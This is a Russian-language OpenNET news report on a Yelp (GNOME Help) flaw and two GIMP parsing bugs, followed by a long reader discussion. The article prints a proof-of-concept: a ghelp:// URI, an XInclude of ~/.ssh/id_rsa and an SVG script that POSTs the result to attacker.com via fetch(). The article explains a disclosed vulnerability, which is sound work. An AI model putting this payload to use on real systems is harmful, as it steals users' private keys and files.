The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

Уязвимости в GNOME Help и GIMP, позволяющие выполнить код при открытии файлов

08.04.2025 10:07

В просмотрщике Yelp, применяемом по умолчанию в GNOME для работы со справочными руководствами (GNOME Help), выявлена уязвимость (CVE-2025-3155), позволяющая выполнить произвольный JavaScript-код при открытии специально оформленных page-файлов. Выполнение подобных скриптов даёт возможность отправить файлы пользователя на сервер атакующего. Проследить за устранением уязвимости в дистрибутивах можно на следующих страницах: Debian, Ubuntu, RHEL, SUSE/openSUSE, Fedora, Arch, FreeBSD.

В GNOME для открытия файлов со справочными руководствами регистрируется URI "ghelp://", обрабатываемый через вызов Yelp. Для атаки злоумышленнику необходимо добиться загрузки своего файла index.page на систему пользователя. Например, можно обманом вынудить загрузить файл через браузер, кликнув на ссылку на сайте атакующего. После того как файл загружен атакующий может инициировать открытие этого документа, перенаправив в браузере переход со своей страницы на URL ghelp://" с путём к каталогу, в который загружен файл. Например, "ghelp:///proc/self/cwd/Downloads", где путь "/proc/self/cwd" ассоциирован с рабочим каталогом текущего процесса (при запуске yelp это будет домашний каталог пользователя).

Уязвимость вызвана тем, что в page-файлах используется формат Mallard, основанный на XML. В данном формате имеется возможность вставки в документ содержимого других файлов, используя механизм XInclude. Для отрисовки page-файлов программа Yelp преобразует их из XML в HTML при помощи XSLT (yelp-xsl), после чего отображает используя движок WebKitGtk. Идея в том, чтобы добиться подстановки JavaScript в результирующий HTML-файл и использовать данный JavaScript для отправки на сервер содержимого, подставленного через XInclude.

Для подстановки JavaScript использовано то, что XSLT копирует некоторые элементы в HTML без разбора, например, целиком переносит элемент <svg> и всё вложенное содержимое. Таким образом, для передачи на внешний сервер файла "~/.ssh/id_rsa" достаточно подставить его в page-документ директивой "include":


   <include parse="text" xmlns="http://www.w3.org/2001/XInclude" href="/proc/self/cwd/.ssh/id_rsa"/>

После чего добавить через элемент <svg:script...> вызов JavaScript с кодом для отправки POST-запроса на внешний сервер, используя функцию fetch():


    <svg:svg xmlns:svg="http://www.w3.org/2000/svg">
      <svg:script>onload=_=>fetch("http://attacker.com/",{method:"POST",body:document.body.outerHTML,mode:"no-cors"})</svg:script>
    </svg:svg>

Дополнительно можно отметить две уязвимости (CVE-2025-2761, CVE-2025-2760) в графическом редакторе GIMP, приводящие к выполнению кода атакующего при открытии пользователем специально подготовленных изображений в форматах XWD и FLI. Обе уязвимости вызваны отсутствием должной проверки размера данных, копируемых в буфер в процессе разбора содержимого файлов. Уязвимости устранены в версии GIMP 3.0.0.

  1. Главная ссылка к новости (https://www.openwall.com/lists...)
  2. OpenNews: Уязвимость в библиотеке libgsf, затрагивающая GNOME
  3. OpenNews: Уязвимость в libcue, приводящая к выполнению кода при загрузке файлов в GNOME
  4. OpenNews: Уязвимость в gnome-exe-thumbnailer, позволяющая выполнить код при просмотре каталога с MSI-файлом
  5. OpenNews: Уязвимость в GNOME Evince, позволяющая выполнить код при построении миниатюр
  6. OpenNews: Уязвимость, позволяющая обойти парольную защиту хранителя экрана GNOME
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/63035-gnome
Ключевые слова: gnome, gimp, yelp
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (174) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (-), 10:35, 08/04/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +13 +/
    > Обе уязвимости вызваны отсутствием должной проверки размера данных,
    > копируемого в буфер в процессе разбора содержимого файлов.

    Да как же так ( ╯°□°)╯ ┻━━┻
    Хотя... это гимп, может ему и простительно.

    ЗЫ: уровень костылизации процедуры показа обычного хелпа впечатляет... хотя можно еще к контейнер завернуть.

     
     
  • 2.3, Аноним (3), 10:38, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +15 +/
    Эти люди ржали над RTF и CHM.
     
     
  • 3.4, Соль земли (?), 10:40, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Что-то мне подсказывает, что в RTF забыли букву M.
     
     
  • 4.5, ryoken (ok), 10:47, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +8 +/
    неа
    RTF: Rich Text Format.
     
     
  • 5.22, ZloySergant (ok), 11:58, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • –2 +/
    >неа
    >RTF: Rich Text Format.

    RTFM: Read that f*ng manual.

     
     
  • 6.110, Аноним (110), 18:23, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • –5 +/
    Вообще-то Read The Following Manual. Но свой культурный уровень ты показал.
     
     
  • 7.125, Аноним (125), 21:07, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +4 +/
    https://en.wikipedia.org/wiki/RTFM
     
  • 3.7, 1 (??), 11:07, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Да тут скорее дело в том, что XML только выглядит, как язык разметки. А на самом деле вполне себе язык программирования (с помощью XSLT). А кто ж проверяет, что там XSLT наделал.

    Странно, что нет уязвимостей с подделкой XSLT.

     
     
  • 4.12, n00by (ok), 11:43, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Высмеиваемое "умею программировать на HTML" внезапно играет новыми красками.
     
  • 4.35, Сталин (?), 13:01, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    XML не язык программирования. Так же как не язык программирования plain text, например. А вот XSLT — язык программирования, просто он основан на XML, так же как Си основан на plain text.
     
     
  • 5.38, Аноним (-), 13:10, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +4 +/
    > XML не язык программирования. Так же как не язык программирования plain text,
    > например. А вот XSLT — язык программирования, просто он основан на
    > XML, так же как Си основан на plain text.

    XSLT часть спеков XML, и многие даже не подозревают о такой подставе.

     
     
  • 6.59, 1 (??), 14:29, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    2 чая этому господину.

    Именнатак !

     
  • 6.100, Аноним (100), 17:15, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Нет, XSLT - это отдельная спецификация. Да, в XSLT всё - ввод, вывод и программа - по определению валидные XML, но сама спецификация XML про XSLT не говорит ровно ничего.

     
  • 3.36, Аноним (-), 13:01, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • –3 +/
    > Эти люди ржали над RTF и CHM.

    Через хелпарь я как-то и винду поимел. Приблуда под админом - позволяля позырить хелп юзеру. Ну я и эскалировал, запустив из диалога открытия cmd.exe. Администый уже. Спасибо за продвинутые диалоги открытия файлов, виндус. Что, не ожидали такой подставы?!

     
     
  • 4.47, User (??), 13:44, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Оооо, хааа-ааа-ааакир! А расскажи еще, как ты винду переустанавливал и активаторы искал - нам очень, ОЧЕНЬ интересно как это в форчун-500 делают!
     
     
  • 5.76, _ (??), 15:30, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +4 +/
    В импортозамещениом "Фартовые 500" жи! ;)
     
     
  • 6.145, User (??), 07:21, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > В импортозамещениом "Фартовые 500" жи! ;)

    Не. Туды "Честного компьютерного мастера Илью"(ТМ) не взяли - приходится бабушкам по подъездам винду переставлять (На линуХ, разумеется) и однокурсницам фоточки с флешек выковыривать - "а таксует он так, для души..."

     
     
  • 7.149, Аноним (-), 10:26, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    >> В импортозамещениом "Фартовые 500" жи! ;)
    > Не. Туды "Честного компьютерного мастера Илью"(ТМ) не взяли - приходится бабушкам по
    > подъездам винду переставлять (На линуХ, разумеется) и однокурсницам фоточки с флешек
    > выковыривать - "а таксует он так, для души..."

    Не надо свой опыт на других проецировать. Это твой сельпошный "энтерпрайз" с совковым душком предел мечтаний для таких печальных кадров как ты. А у меня жизня так то - поинтереснее твоей унылости. И летаю я в целом - выше. За что и смотрю на таких как ты сверху вниз. Но ты демонстрируй свою убогую примитивную душонку, кто ж тебе запретит? Хорошо получается, так держать.

     
     
  • 8.169, _ (??), 17:01, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    NIHрена себе ЧСВ у некоторых 8-о Ты эта - попроси мамку, пусть зелёнкой помает п... текст свёрнут, показать
     
  • 5.148, Аноним (-), 10:13, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Сразу видно энтерпрайзника Не знает что у корпов - сервер активации и или анлим... большой текст свёрнут, показать
     
     
  • 6.165, User (??), 14:08, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    В смысле, KMS Auto - другой ка-аа-аакир по варезникам искал, этот не в курсе Ну... большой текст свёрнут, показать
     
  • 4.62, 1 (??), 14:31, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Ну дык стандартный способ "ломания" всяких "киосков" у которых была функция "Help".
     
  • 3.87, Аноним (-), 16:02, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >Эти люди ржали над RTF и CHM.

    Это форматы придуманные в стенах Майкрософта. Истинный линуксоид никогда не будет юзать форматы Майкрософта.

     
     
  • 4.108, какая разница (?), 17:53, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Но запускать под вайном экзешники игр и всяких приблуд для черчения - "это другое", верно?
     
     
  • 5.143, Аноним (143), 02:36, 09/04/2025 Скрыто ботом-модератором     [к модератору]
  • +/
     
  • 5.158, этодругоенормальнодлявзрослогочеловека (?), 12:51, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    верно. мне не нужно устанавливать тиктокомусор и постоянно там рыться, н если нужно я наду способ посмотреть на пляшущих придурков. надеюсь, так понятно?
     
  • 4.170, _ (??), 17:08, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > Это форматы придуманные в стенах Майкрософта.

    Вашего хозяина^W^W платинового спонсора :)

    > Истинный линуксоид никогда не будет юзать форматы Майкрософта.

    Истинный линуксоид будет доводить несчастных некорпоративных коммитеров до вывиха мозга, заставлять иъ с*с*ть и кланяться и всё вот это вот ...
    А патчи от M$ в ведро напрямую заходят, без коди-ревью и без вопросов и прочей недостойной бар канители :))))

     
     
  • 5.193, Аноним (193), 00:41, 11/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    У людей нет хозяев Энтузиастам нет нужды кланяться и ну что вы там обычно дел... большой текст свёрнут, показать
     
  • 3.97, soarin (ok), 16:50, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Вообще линуксы в этом отстают:
    уязвимости при генерации превьюшек файлов, автозапуска и вон сабж были гораздо раньше в Windows
    а в линуксах вон повторяют спустя года
     
     
  • 4.144, Аноним (143), 02:46, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    В каком году появились autorun, autorun.sh и .autorun в спецификациях freedesktop.org? Вместе с autoopen и .autoopen. Да и через превьюхи на десктопе ненужное лет 15 ломается, не меньше - CVE-2010-2640 как пример.
     
     
  • 5.150, Аноним (-), 10:35, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > В каком году появились autorun, autorun.sh и .autorun в спецификациях freedesktop.org?

    Таки да, позже чем autorun.inf/autorun.exe в винде - и куча самоходных вирусей прописывающихся на флешки таким манером. Так что в винде это реально летало и воткнув флеху с неотколюченным autorun можно было получить сюрпризов. А в линухе это никогда не было массовым, и тем более не работало по дефолту - с флех.

     
     
  • 6.162, iPony129412 (?), 13:48, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > А в линухе это никогда не было массовым

    Кстати. Где-то с 2010 года часто пользовался в Virtual Box.

    Там примонируется ISO образ. И «хотите запустить бинарник?».
    Удобно. Хотя в этой гномовской штуке уязвимости находили.

     
  • 2.8, Аноним (8), 11:07, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > позволяющая выполнить произвольный JavaScript-код при открытии специально оформленных page-файлов

    Под Linux нет вирусов.
    Есть всяческие doorways, Bloatware.

     
     
  • 3.11, n00by (ok), 11:37, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Вирусов почти нигде нет. Вирус -- по определению -- внедряет свой код (инфицирует) в полезный исполняемый файл. Это достаточно сложно реализовать даже в самом примитивном варианте. Подавляющее большинство местных, считающих себя системными программистами (разработчиками операционных систем), не справятся, тогда как это базовые знания и умения (формат исполняемых файлов, поиск машинных инструкций в документации).
     
     
  • 4.13, Аноним (13), 11:48, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Зато есть ПО собранное от Васи в репозитории, которое делает непонятно что)
     
     
  • 5.20, n00by (ok), 11:54, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Да всё понятно оно было еще два века назад, оказывается. Сферы разума Белосельского-Белозёрского с промежутками, где всякие активисты и предводители сект. Эффект Даннинга-Крюгера лишь тень.
     
  • 5.27, Аноним (27), 12:33, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Не использовать никаие репозитории, кроме официального вашего дистра?
    А, нет пакета нужной софтинки... Ну так самому собрать пакетик.
     
     
  • 6.44, Аноним (8), 13:28, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > Не использовать никаие репозитории, кроме официального вашего дистра.

    Использовать только Default Wallpapers.

     
  • 6.75, n00by (ok), 15:29, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    А что там, в официальных? Кто понимает? Никто, пока не стрельнёт. ;)  https://bugzilla.altlinux.org/show_bug.cgi?id=38212#c2
     
     
  • 7.99, Афроним (?), 17:14, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Мипсов нет,проверить не на чем. Чего привязался? Пусть полезным занимаются,а не Кеды переписывают.
     
     
  • 8.157, n00by (ok), 11:30, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Там дело не в MIPS, где вылезло достаточно безобидно, а вообще в макросе, и таки... текст свёрнут, показать
     
  • 4.16, Аноним (16), 11:50, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > Подавляющее большинство местных

    это все кроме вас

     
     
  • 5.24, n00by (ok), 12:03, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Всем такое и ни к чему знать. Но наверняка есть, кто справится, потенциально, процентов 5-10.

    Это должно быть понятно из формулы "Hackers, Programmers & Rebels UNITE!"

    Какой смысл в последних? Они ничего не создают, не являются обычными пользователями, способными выдать дельные требования. Понижают общий уровень, отнимают время, мешают расти и перерасти владельца франшизы.

     
     
  • 6.25, Аноним (25), 12:28, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Мир, труд, май - говорили они, а щас - Война, каторга (пашите в три смены), а май давно уже стал февралем.

    пс: всякого кто кричит "UNITE!" надо "юнайтить с гамном".

     
     
  • 7.39, шёл мимо прифигел от прочитанного (?), 13:10, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +2 +/
    А это когда те, кто за братство трудящихся были (мир, труд, май т.е. провозглашали) войну, каторгу и февраль учредили? Вы откуда то из параллельной вселенной пишите? Или из палаты для буйных?

    А то те, кто за мир, труд и май были, они ещё восьмичасовой рабочий день протащили, соц. обеспечение, декреты и прочие оплачиваемые отпуска... Ну и да, за мир во всём мире были, потому что капитал гонит в окопы трудящихся. А нафига оно трудящимся?

    А вот неоплачиваемые переработки, произвол работодателя и иже с ним, это из другого лагеря. Из лагеря атлантов всяких, плечи расправляющих. Не путайте.

     
     
  • 8.49, Аноним (-), 13:50, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Хм а разожжем мировой пожар революции это что На шашлыки с пивком приглашали... большой текст свёрнут, показать
     
     
  • 9.55, Аноним (55), 14:20, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    ЭТО ДРУГОЕ... текст свёрнут, показать
     
  • 9.63, Аноним (8), 14:33, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Все вышли с транспарантами, Linux, Linux ... текст свёрнут, показать
     
  • 9.73, Aliech (ok), 15:21, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Это приглашение не ходить в окопы второй мировой Потому что мировая война - это... большой текст свёрнут, показать
     
     
  • 10.89, Аноним (-), 16:06, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • –3 +/
    Правда Интересное мнение Которую развязали два заядлых союзника - нацики и ком... большой текст свёрнут, показать
     
     
  • 11.104, Aliech (ok), 17:40, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +2 +/
    А они разве были союзниками Пруфы Договор о взаимопомощи или союзных обязатель... большой текст свёрнут, показать
     
     
  • 12.117, Аноним (-), 18:49, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Союзы бывают разные Например торговые соглашения Советско-германское торговое ... большой текст свёрнут, показать
     
     
  • 13.147, Aliech (ok), 09:30, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Торговое соглашение никогда не называлось договором о дружбе Торговое соглашени... большой текст свёрнут, показать
     
     
  • 14.199, Аноним (-), 19:11, 11/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    А, т е просто люди приехали в сибирь и от скуки решили самоубиваться Ну да, и... большой текст свёрнут, показать
     
  • 11.126, Вы забыли заполнить поле Name. (?), 21:18, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Ох facepalm Найдите что ли книгу какую нибудь от историков про историю НСД... текст свёрнут, показать
     
     
  • 12.127, Аноним (25), 21:22, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Гитлер тоже написал, ток там ничего про врагов комуняк ни слова ... текст свёрнут, показать
     
  • 11.146, Аноним (146), 08:30, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Не было никакого государства, УССР перешло в UUSA ... текст свёрнут, показать
     
  • 10.90, Аноним (-), 16:08, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Немного забавно как коммуняк в общем и совок в частности наяриват человек, родив... текст свёрнут, показать
     
  • 7.103, Аноним (103), 17:38, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Наоборот же всякого кто против UNITE, иначе капутъ всем.
     
     
  • 8.105, Аноним (25), 17:41, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    а чем твой UNITE от ОПГ отличается ... текст свёрнут, показать
     
     
  • 9.122, Аноним (103), 20:12, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    ОПГ не просит помогать и объединятся ОПГ заставляет и приказывает ... текст свёрнут, показать
     
     
  • 10.123, Аноним (25), 20:17, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    можно вас попросить могилу отрыть детский сад, очки даже не розовые, а цвета де... текст свёрнут, показать
     
  • 6.40, Аноним (40), 13:12, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > Какой смысл в последних? Они ничего не создают, не являются обычными пользователями,
    > способными выдать дельные требования. Понижают общий уровень, отнимают время, мешают расти
    > и перерасти владельца франшизы.

    Ну, это, ты можешь затыкать амбразуру и лично своей тушкой. А как по мне так прикольнее туды Rebel'а отправить. Это ведь его специализация :)

     
     
  • 7.64, Аноним (8), 14:34, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Ну, это, ты можешь затыкать амбразуру и лично своей тушкой.

    Катушка стали весит 5 тонн.

     
  • 7.79, n00by (ok), 15:36, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Какую амбразу надо затыкать в программировании, зачем и где? В священной войне GPL vs. BSDL? Машины должны служить людям - такой "идеологии" достаточно, остальное лишнее.
     
     
  • 8.83, 1 (??), 15:48, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Эххххх ... текст свёрнут, показать
     
  • 4.26, Аноним (27), 12:29, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Ещё до интернетов, в компутерных журналах 1990-х подробно разбирался формат исполняемого файла DOS MZ, куда в него прилепить свой код, куда прописать передачу управления на него, как потом передать управление легитимному коду. Так что, ничего там ракетнонаучного.
    Аналогично можно было бы проделать подобное и с файлом ELF, если, конечно, удастся получить право записи в него.
     
     
  • 5.45, Аноним (8), 13:30, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • –3 +/
    > Ещё до интернетов, в компутерных журналах 1990-х подробно разбирался формат исполняемого файла DOS MZ, куда

    А еще ведь в книжке Наука и Техника СССР 1917 г.

     
     
  • 6.50, Аноним (27), 13:56, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Особенно, учитывая, что СССР образовался в декабре 1922. Хоть в Вики иногда звглядывай.
     
     
  • 7.61, Аноним (8), 14:30, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Наука и техника СССР. 1917-1927

    https://rusneb.ru/catalog/006001_000118_32/

     
     
  • 8.78, Aliech (ok), 15:32, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Товарищ, это издание 1928 года, с обзором за обозначенные года Оно не отменяет ... текст свёрнут, показать
     
     
  • 9.81, Аноним (8), 15:46, 08/04/2025 Скрыто ботом-модератором     [к модератору]
  • +/
     
  • 8.118, Аноним (118), 18:52, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    https ir-3 ozone ru multimedia wc1000 1001987246 jpg... текст свёрнут, показать
     
  • 5.80, n00by (ok), 15:40, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    И толку от этих описаний? Что нет способных, очевидно из распространённости мантры "в Linux нет вирусов" -- не понимают, о чём она вообще.
     
     
  • 6.82, Аноним (8), 15:47, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > И толку от этих описаний? Что нет способных, очевидно из распространённости мантры "в Linux нет вирусов" -- не понимают, о чём она вообще.

    Ну видимо про развитие электроники после Николы ( который Тесла, не который Tesla. )

     
  • 6.109, Аноним (109), 18:08, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Ну а что не так? Попробуй модифицировать файл ELF не рутом. А под рутом работать и, тем более, запускать неизвестно где взятые бинарники - ССЗБ.
     
     
  • 7.154, n00by (ok), 10:45, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > Ну а что не так?

    То, что в вопрос лезут далёкие от темы и дурачат всех прочих.

    > Попробуй модифицировать файл ELF не рутом.

    Попробуй понять, что в вопросах безопасности исходят из правила: противник обладает всеми необходимыми техническими средствами.

    > под рутом работать и, тем более, запускать неизвестно где взятые бинарники
    > - ССЗБ.

    Эпичность замаха на СЗИ Девянина, SELinux от NSA и т.п. поражает. Если кто не в курсе, при их проектировании исходили из того, что недоверенный код попал в систему непредусмотенным образом и начал исполняться с правами рут -- чему и необходимо помешать.

     
  • 4.28, Аноним (8), 12:34, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > считающих себя системными программистами (разработчиками операционных систем), не справятся, тогда как это базовые знания и умения

    Хаккер может взломать твой компьютер через подсветку клавиатуры.

     
     
  • 5.52, oshu (?), 14:07, 08/04/2025 Скрыто ботом-модератором     [к модератору]
  • +/
     
     
  • 6.58, Аноним (8), 14:27, 08/04/2025 Скрыто ботом-модератором     [к модератору]
  • +/
     
  • 5.84, n00by (ok), 15:49, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    >> считающих себя системными программистами (разработчиками операционных систем), не справятся, тогда как это базовые знания и умения
    > Хаккер может взломать твой компьютер через подсветку клавиатуры.

    Хаккер понимает, что вирус - это про "закреп", а не про payload.

     
     
  • 6.101, Аноним (25), 17:35, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > Хаккер понимает, что вирус - это про "закреп", а не про payload.

    Вирус - это про максимальный вред с максимальным распространением (червь), про "закреп" - это типичный троян (руткит и т.д.).

     
     
  • 7.155, n00by (ok), 11:02, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Если вирус внедряет свой код в исполняемые файлы, запускаемые при старте системы... большой текст свёрнут, показать
     
     
  • 8.159, Аноним (159), 13:13, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    https ru wikipedia org wiki Файловый_вирус Файловый вирус англ File infe... большой текст свёрнут, показать
     
     
  • 9.160, n00by (ok), 13:25, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Я не вижу смысла читать эту портянку текста Если она уточняет мои определения, ... текст свёрнут, показать
     
     
  • 10.163, Аноним (159), 13:50, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    и я не видел смысла печатать вам определение понятия компьютерный вирус и дал сс... текст свёрнут, показать
     
     
  • 11.180, n00by (ok), 10:59, 10/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Правильно сделал Лучший способ показать, что сам не понимаешь ... текст свёрнут, показать
     
     
  • 12.181, Аноним (159), 15:12, 10/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    не вижу необходимости понимать людские глупости... текст свёрнут, показать
     
     
  • 13.184, n00by (ok), 18:47, 10/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Согласен с тобой Мне любопытен сам феномен 3-й день пошёл ... текст свёрнут, показать
     
     
  • 14.190, Аноним (159), 19:50, 10/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    продолжайте наблюдение... текст свёрнут, показать
     
     
  • 15.196, n00by (ok), 11:25, 11/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Продолжаю и давно Рассказывай дальше, как я тебе безразличен Начало ветки ты в... текст свёрнут, показать
     
     
  • 16.197, Аноним (159), 13:34, 11/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Напомним Хаккер понимает, что вирус - это про закреп , а не про payload ... текст свёрнут, показать
     
     
  • 17.198, n00by (ok), 18:12, 11/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Коротковата память Подавляющее большинство местных, считающих себя системными п... текст свёрнут, показать
     
     
  • 18.200, Аноним (159), 19:35, 11/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    повторим если не ясно Вирус - это про максимальный вред с максимальным распростр... текст свёрнут, показать
     
     
  • 19.201, n00by (ok), 08:56, 12/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    И что тебе не ясно в словах Хаккер понимает Ник на Вендорсах у тебя какой Su... текст свёрнут, показать
     
     
  • 20.203, Аноним (159), 14:32, 12/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Я же не за это говорил, а за вирус - это про закреп Да и определение понят... текст свёрнут, показать
     
  • 21.206, n00by (ok), 17:34, 12/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    У меня всё есть я читал, что они пишут, включая FAQ по закрепу и даже помоги... текст свёрнут, показать
     
  • 11.186, Аноним (193), 18:53, 10/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Лозинского aidstest несправедливо забыли Сразу вспоминается стишок из дядиже... текст свёрнут, показать
     
  • 11.189, Аноним (159), 19:47, 10/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    каюсь ... текст свёрнут, показать
     
  • 9.161, n00by (ok), 13:28, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Вот этого достаточно Что-то перевели, не владея предметом Инфектор - часть вир... текст свёрнут, показать
     
     
  • 10.164, Аноним (159), 14:08, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Касперский Е Компьютерные вирусы в MS-DOS Предлагаемая книга рассчитана на две ... большой текст свёрнут, показать
     
     
  • 11.179, n00by (ok), 10:58, 10/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Ну да Ты мастер копировать Понимание для этого не требуется ... текст свёрнут, показать
     
     
  • 12.182, Аноним (159), 15:22, 10/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Спасибо, что пользуетесь нашим продуктом Антивирусный комплекс 171 8216 Докт... текст свёрнут, показать
     
  • 12.192, Аноним (159), 23:44, 10/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    ч и т д ... текст свёрнут, показать
     
  • 4.128, Аноним (128), 21:25, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Исходников, том же модуль для meterpreter (indector_pe) и это без гуглежа. А если поискать, поискать так будет еще уйма теоретических работ и слитых вариантов.

    Так что если есть время, желание, и какой-то опыт - справятся.

    Тут, конечно может быть тирада, мол а самому... а вот без гуглежа... Но какой смысл изобретать колесо, и идти по всем граблям еще раз, когда можно заскочить на уже достойный уровень, а при желании улучшить?

     
     
  • 5.156, n00by (ok), 11:27, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Так нет ни опыта, ни необходимых для его приобретения основополагающих знаний. Иначе не распространяли бы мантру, одурачивая публику. Ума ведь не хватает даже заявить "я пока не видел" вместо "нет".
     
  • 4.183, Аноним (193), 18:46, 10/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Это лишь способ заражения, характерный для файловых вирусов Бывают вирусы, ко... большой текст свёрнут, показать
     
     
  • 5.187, n00by (ok), 19:08, 10/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    В смысле, dll внедряется в адресное пространство процесса explorer exe Это уже ... большой текст свёрнут, показать
     
     
  • 6.194, Аноним (193), 01:30, 11/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Не, для инъекции могут потребоваться привилегии, и она очень подозрительна для а... большой текст свёрнут, показать
     
     
  • 7.195, n00by (ok), 11:22, 11/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Как именно dll внедряется в АП процесса - дело десятое Если проактивная защита ... большой текст свёрнут, показать
     
     
  • 8.204, Аноним (204), 16:20, 12/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Тут я уже потерял нить Термин троян появился существенно позже И, на мой взг... большой текст свёрнут, показать
     
     
  • 9.205, n00by (ok), 17:23, 12/04/2025 [^] [^^] [^^^] [ответить]  
